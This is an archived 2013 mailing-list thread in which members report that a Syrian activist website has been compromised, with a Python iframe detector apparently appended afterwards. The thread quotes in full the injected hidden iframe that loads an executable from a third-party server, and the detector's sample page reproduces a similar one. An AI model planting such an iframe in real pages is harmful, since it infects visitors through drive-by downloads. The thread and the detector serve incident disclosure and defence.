[liberationtech] Syrian-martyrs.com website probably compromised by virus

SiNA Rabbani sina at redteam.io
Tue Jan 29 14:34:17 PST 2013


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

This is the malware:
> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/


- --SiNA



SiNA Rabbani:
> holy shit:
> 
> <iframe name="I1" width="10" height="10"
> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
> border="0" frameborder="0">
> 
> :/ if you are running Windows don't even go there!!!
> 
> 
> Andrew Lewis:
>> I can get to this in 6 hours or so, maybe someone is willing to 
>> jump on this before then?
> 
>> -Andrew
> 
>> On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
> 
>>> Dear Libtech,
>>> 
>>> We just saw that the website : http://www.syrian-martyrs.com
>>> is probably compromised. Every page of the website contains an 
>>> iFrame which links to a .exe file which is detected as a virus
>>> by antivirus software: 
>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>> 
>>> The fact that the HTML code is present at the bottom of each page makes
>>> me think that the "index.php" page has been changed in a way
>>> that makes that iFrame appear on every page of the website,
>>> after the dynamic content.
>>> 
>>> It also probably means that the attackers have some kind of 
>>> access to the server. My guess would be going to a PHP shell,
>>> but I'm no expert in this.
>>> 
>>> Any help, clue, investigation, would be very welcome :)
>>> 
>>> Thank you, KheOps
>>> 
>>> -- Unsubscribe, change to digest, or change password at: 
>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 
> 
> 
> 

- -- 
“Be the change you want to see in the world.” Gandhi

OTR: inf0 at jabber.ccc.de
a5dae15f45a37e9768f6deae7b54807fc4942ec9
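A small detector for the kind of injection KheOps describes (a tiny, border-less iframe appended after the dynamic content, pointing at an .exe on a third-party host), added here as an example and not code from anyone in the thread; the sample HTML, the hostnames in it and the site_host value are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: normal content plus a footer carrying a near-invisible
# iframe that loads an executable from another host (hostnames are made up).
SAMPLE_HTML = """<html><body>
<h1>Site</h1><p>dynamic content</p>
<iframe src="https://video.example.com/embed/abc" width="560" height="315"></iframe>
<iframe name="I1" width="10" height="10" src="http://cdn.example.net/uploads/ActiveX.exe"
 border="0" frameborder="0"></iframe>
</body></html>"""

EXECUTABLE_SUFFIXES = (".exe", ".scr", ".msi", ".dll")

class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser lowercases tag and attribute names
            self.iframes.append({k: (v or "") for k, v in attrs})

def _px(value):
    """Parse a width/height attribute such as '10' or '10px'; None if absent."""
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None

def find_suspicious_iframes(html, site_host, max_px=30):
    """Return [(src, reasons)] for iframes that are tiny or load an executable.
    'offsite' is appended when such a frame also points away from site_host."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for frame in parser.iframes:
        src = frame.get("src", "")
        reasons = []
        w, h = _px(frame.get("width", "")), _px(frame.get("height", ""))
        if w is not None and h is not None and w <= max_px and h <= max_px:
            reasons.append("tiny")
        if urlparse(src).path.lower().endswith(EXECUTABLE_SUFFIXES):
            reasons.append("executable")
        if reasons:
            host = urlparse(src).hostname
            if host and host != site_host:
                reasons.append("offsite")
            findings.append((src, reasons))
    return findings
```

Running it over every page of a site and diffing the result against a known-clean crawl is a quick way to confirm the "every page" symptom the report mentions.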

